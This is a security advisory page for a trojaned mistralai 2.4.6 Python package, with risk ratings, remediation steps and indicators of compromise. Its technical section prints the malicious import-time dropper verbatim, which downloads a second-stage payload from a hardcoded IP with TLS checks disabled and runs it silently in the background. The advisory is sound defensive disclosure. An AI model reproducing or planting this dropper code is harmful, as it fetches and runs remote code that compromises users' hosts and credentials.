GHSA-wx9m-wx4f-4cmg: mistralai 2.4.6: supply chain dropper executes on import

GHSA-wx9m-wx4f-4cmg CRITICAL
Published May 18, 2026
CISO Take

The official mistralai Python SDK version 2.4.6 was trojaned with a malicious dropper that silently executes the moment any Linux system runs `import mistralai` — no user interaction beyond a routine package import. With 716 downstream dependents, every LLM pipeline, CI/CD job, or development environment that installed this version on Linux is a potential breach: the dropper fetches and daemonizes an unknown second-stage payload (`transformers.pyz`) from a hardcoded IP (`83.142.209.194`) with TLS verification disabled and output fully suppressed, making initial execution nearly invisible. The upload bypassed PyPI Trusted Publishing and has no corresponding tag or release in the upstream GitHub repository, confirming this was an unauthorized injection into a legitimate, high-trust package. Any Linux host that ran `import mistralai` since 2026-05-12 00:05 UTC must be treated as fully compromised: rotate all credentials reachable from that process, review cloud and host audit logs for unusual activity, check for `/tmp/transformers.pyz` on disk, and immediately pin to `mistralai==2.4.5` or install directly from the verified git tag.

Sources: GitHub Advisory ATLAS

What is the risk?

CRITICAL (CVSS 9.6). Exploitation requires zero attacker-side interaction post-upload: any developer or automated pipeline on Linux that executes `import mistralai` triggers the dropper unconditionally. AI/ML environments are disproportionately exposed because they routinely install SDK updates without strict version pinning, run with cloud credentials scoped to sensitive model APIs and data stores, and often operate in CI/CD contexts where lateral movement potential is high. The second-stage payload content is unanalyzed, meaning the true blast radius — credential harvesting, data exfiltration, ransomware, persistent access — is unknown and must be assumed worst-case. The package is now quarantined on PyPI, limiting new infections, but hosts already affected remain compromised until forensically cleared.

How does the attack unfold?

Supply Chain Injection
Adversary uploads trojanized mistralai 2.4.6 to PyPI, bypassing Trusted Publishing controls and with no corresponding GitHub tag or release workflow, implanting a dropper function in `src/mistralai/client/__init__.py`.
AML.T0010.001
Delivery via Dependency Install
Developer or CI/CD system runs `pip install mistralai` without version pinning, silently receiving the malicious 2.4.6 wheel; no code executes at install time.
AML.T0011.001
Dropper Execution on Import
`import mistralai` triggers `_run_background_task()` at module-load time, which downloads `transformers.pyz` from `83.142.209.194` via curl with TLS verification disabled and spawns it as a detached Python process with suppressed output.
AML.T0050
Second-Stage Payload Impact
Unknown `transformers.pyz` payload executes with full process privileges of the ML workload — likely harvesting cloud credentials, LLM API keys, and sensitive AI artifacts before exfiltrating to adversary infrastructure.
AML.T0025

What systems are affected?

Package Ecosystem Vulnerable Range Patched
Mistral AI pip = 2.4.6 No patch
750 736 dependents Pushed 7d ago 0% patched Full package profile →

Do you use Mistral AI? You're affected.

How severe is it?

CVSS 3.1
9.6 / 10
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Moderate

What is the attack surface?

AV AC PR UI S C I A
AV Network
AC Low
PR None
UI Required
S Changed
C High
I High
A High

What should I do?

1 step
  1. Immediate (0-24h): (1) Pin mistralai to ==2.4.5 across all dependency files and lockfiles, or install from git+https://github.com/mistralai/client-python.git@v2.4.5. (2) On all Linux hosts, run ls -la /tmp/transformers.pyz — presence confirms download executed. (3) Search process environment history for MISTRAL_INIT=1. (4) Check for outbound connections to 83.142.209.194 in firewall/proxy logs from 2026-05-12 00:05 UTC onward. (5) For any host where import mistralai ran with 2.4.6: assume compromise, rotate all credentials accessible to that process (cloud provider keys, LLM API keys, DB credentials, CI/CD tokens). Detection: grep -rn 'mistralai.*2\.4\.6' requirements*.txt pyproject.toml uv.lock poetry.lock Pipfile* 2>/dev/null. Verify installed version: pip show mistralai | grep -i ^version. Block network access to 83.142.209.194 at perimeter. SHA-256 of malicious sdist: 6dbaa43bf2f3c0d3cddbca74967e952da563fb974c1ef9d4ecbb2e58e41fe81b.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Art. 15 - Accuracy, robustness and cybersecurity Art. 9 - Risk management system
ISO 42001
8.1 - Operational planning and control A.6.1 - AI system supply chain
NIST AI RMF
GOVERN 6.2 - AI supply chain risk policies MAP 5.2 - AI supply chain risk identification
OWASP LLM Top 10
LLM03 - Supply Chain

Frequently Asked Questions

What is GHSA-wx9m-wx4f-4cmg?

The official mistralai Python SDK version 2.4.6 was trojaned with a malicious dropper that silently executes the moment any Linux system runs `import mistralai` — no user interaction beyond a routine package import. With 716 downstream dependents, every LLM pipeline, CI/CD job, or development environment that installed this version on Linux is a potential breach: the dropper fetches and daemonizes an unknown second-stage payload (`transformers.pyz`) from a hardcoded IP (`83.142.209.194`) with TLS verification disabled and output fully suppressed, making initial execution nearly invisible. The upload bypassed PyPI Trusted Publishing and has no corresponding tag or release in the upstream GitHub repository, confirming this was an unauthorized injection into a legitimate, high-trust package. Any Linux host that ran `import mistralai` since 2026-05-12 00:05 UTC must be treated as fully compromised: rotate all credentials reachable from that process, review cloud and host audit logs for unusual activity, check for `/tmp/transformers.pyz` on disk, and immediately pin to `mistralai==2.4.5` or install directly from the verified git tag.

Is GHSA-wx9m-wx4f-4cmg actively exploited?

No confirmed active exploitation of GHSA-wx9m-wx4f-4cmg has been reported, but organizations should still patch proactively.

How to fix GHSA-wx9m-wx4f-4cmg?

Immediate (0-24h): (1) Pin `mistralai` to `==2.4.5` across all dependency files and lockfiles, or install from `git+https://github.com/mistralai/client-python.git@v2.4.5`. (2) On all Linux hosts, run `ls -la /tmp/transformers.pyz` — presence confirms download executed. (3) Search process environment history for `MISTRAL_INIT=1`. (4) Check for outbound connections to `83.142.209.194` in firewall/proxy logs from 2026-05-12 00:05 UTC onward. (5) For any host where `import mistralai` ran with 2.4.6: assume compromise, rotate all credentials accessible to that process (cloud provider keys, LLM API keys, DB credentials, CI/CD tokens). Detection: `grep -rn 'mistralai.*2\.4\.6' requirements*.txt pyproject.toml uv.lock poetry.lock Pipfile* 2>/dev/null`. Verify installed version: `pip show mistralai | grep -i ^version`. Block network access to `83.142.209.194` at perimeter. SHA-256 of malicious sdist: `6dbaa43bf2f3c0d3cddbca74967e952da563fb974c1ef9d4ecbb2e58e41fe81b`.

What systems are affected by GHSA-wx9m-wx4f-4cmg?

This vulnerability affects the following AI/ML architecture patterns: LLM API integration pipelines, RAG pipelines, AI agent frameworks, ML training and evaluation pipelines, CI/CD build and test environments.

What is the CVSS score for GHSA-wx9m-wx4f-4cmg?

GHSA-wx9m-wx4f-4cmg has a CVSS v3.1 base score of 9.6 (CRITICAL).

What is the AI security impact?

Affected AI Architectures

LLM API integration pipelinesRAG pipelinesAI agent frameworksML training and evaluation pipelinesCI/CD build and test environments

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0011.001 Malicious Package
AML.T0025 Exfiltration via Cyber Means
AML.T0055 Unsecured Credentials
AML.T0074 Masquerading
AML.T0109 AI Supply Chain Rug Pull

Compliance Controls Affected

EU AI Act: Art. 15, Art. 9
ISO 42001: 8.1, A.6.1
NIST AI RMF: GOVERN 6.2, MAP 5.2
OWASP LLM Top 10: LLM03

What are the technical details?

Original Advisory

The `mistralai` PyPI package version `2.4.6` contains a malicious dropper that executes on import on Linux. No `v2.4.6` tag, commit, or release workflow run exists in this repository, the legitimate latest version before the upload was `2.4.5`, and the upload bypassed this repository's normal release pipeline (which uses PyPI Trusted Publishing). The `mistralai` PyPI project is currently quarantined. ## Affected - `mistralai==2.4.6` on PyPI. Versions `2.4.5` and earlier are not known to be affected. ## What the malicious code does A function named `_run_background_task` was added to `src/mistralai/client/__init__.py` and called at module-load time. Reproduced from the public report in [#523](https://github.com/mistralai/client-python/issues/523): ```python import subprocess as _sub import os as _os def _run_background_task(): if not _sys.platform.startswith("linux") or _os.environ.get("MISTRAL_INIT"): return _os.environ["MISTRAL_INIT"] = "1" _url = "https://83.142.209.194/transformers.pyz" _dest = "/tmp/transformers.pyz" try: if not _os.path.exists(_dest): _sub.run(["curl", "-k", "-L", "-s", _url, "-o", _dest], timeout=15) if _os.path.exists(_dest): _sub.Popen( [_sys.executable, _dest], stdout=_sub.DEVNULL, stderr=_sub.DEVNULL, start_new_session=True, env=_os.environ.copy() ) except: pass _run_background_task() ``` On Linux only, the function: 1. Returns early if `MISTRAL_INIT` is already set in the environment. 2. Sets `MISTRAL_INIT=1` so the spawned child does not re-trigger the dropper if it imports `mistralai`. 3. Downloads `https://83.142.209.194/transformers.pyz` to `/tmp/transformers.pyz` with `curl -k -L -s` (TLS verification disabled, 15 s timeout). Skips the download if the file is already present. 4. Spawns `transformers.pyz` with the current Python interpreter (`sys.executable`) as a detached process via `Popen(..., start_new_session=True)`, with stdout and stderr discarded and any exception silently swallowed. On non-Linux platforms the function returns immediately and does nothing. The trigger is `import mistralai`, not package installation. `pip install` of a wheel does not execute package code; for an sdist it runs PEP 517 build hooks but those are in `setup.py` / `pyproject.toml`, not in `__init__.py` — so `pip install`, `pip download`, and `pip wheel` do not invoke this dropper. The contents of `transformers.pyz` are not in the package and were not analyzed in this advisory. The behavior of the second-stage payload on the host is therefore unknown. ## Recommendation Any Linux environment that imported `mistralai==2.4.6` should be treated as potentially compromised pending forensic review. Rotate every credential reachable from the importing process and review host and cloud audit logs for activity from approximately 2026-05-12 00:05 UTC onward (per the timing reported in #523). ## Check whether you are affected Installed version: ```bash pip show mistralai | grep -i ^version ``` Dependency files and lockfiles: ```bash grep -n -E 'mistralai\b.*2\.4\.6' \ requirements*.txt pyproject.toml uv.lock poetry.lock Pipfile Pipfile.lock 2>/dev/null ``` Dropped file on disk: ```bash ls -la /tmp/transformers.pyz ``` The presence of `/tmp/transformers.pyz` on a host that imported `mistralai==2.4.6` indicates the download step ran successfully. Combined with absence of `MISTRAL_INIT` in the host's process environment history, it does not by itself confirm the second-stage executed; conversely its absence does not rule out execution if the file was cleaned up. ## Remediation 1. Pin `mistralai` to `2.4.5` or earlier. While the PyPI project is quarantined, install from this repository at a known-good tag, e.g. `git+https://github.com/mistralai/client-python.git@v2.4.5`. 2. On affected Linux hosts, rotate every credential reachable from the importing process and review host and cloud audit logs. ## Indicators of compromise All IOCs below come from the public report in [#523](https://github.com/mistralai/client-python/issues/523). - File: `/tmp/transformers.pyz` - Process: a Python interpreter (`sys.executable`) running `/tmp/transformers.pyz` detached from the parent's process group, with stdout/stderr to `/dev/null` - Environment variable: `MISTRAL_INIT=1` - Outbound HTTPS to `83[.]142[.]209[.]194` from `curl` (no TLS verification) - Function added to the package: `_run_background_task` in `src/mistralai/client/__init__.py` - SHA-256 of the malicious sdist (as reported in #523): `6dbaa43bf2f3c0d3cddbca74967e952da563fb974c1ef9d4ecbb2e58e41fe81b` ## References - Public report with the dropper code: https://github.com/mistralai/client-python/issues/523 - Quarantined PyPI project: https://pypi.org/project/mistralai/

Exploitation Scenario

An adversary with sufficient access to push to the mistralai PyPI project (via compromised maintainer credentials or a PyPI platform-level weakness) publishes version 2.4.6, which passes superficial review since it increments the legitimate version number. A developer or CI/CD runner executes `pip install mistralai` without a version pin and receives 2.4.6. On the next pipeline run — a training job, an evaluation script, an agent workflow — `import mistralai` fires and `_run_background_task()` runs silently: it sets `MISTRAL_INIT=1` to avoid re-triggering, downloads `transformers.pyz` from `83.142.209.194` over unauthenticated HTTPS, and forks a detached Python process with all output discarded. The second-stage payload now runs with the full privileges of the ML engineer's process — access to cloud credentials, LLM API keys, training data, proprietary model weights, and internal infrastructure. Given that this is part of the documented 'mini-shai-hulud' campaign that simultaneously hit npm packages, the payload likely performs automated credential harvesting and exfiltration to adversary infrastructure.

Weaknesses (CWE)

CWE-506 — Embedded Malicious Code: The product contains code that appears to be malicious in nature.

  • [Implementation, Operation] Remove the malicious code and start an effort to ensure that no more malicious code exists. This may require a detailed review of all code, as it is possible to hide a serious attack in only one or two lines of code. These lines may be located almost anywhere in an application and may have been intentionally obfuscated by the attacker.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Timeline

Published
May 18, 2026
Last Modified
May 18, 2026
First Seen
May 18, 2026

Related Vulnerabilities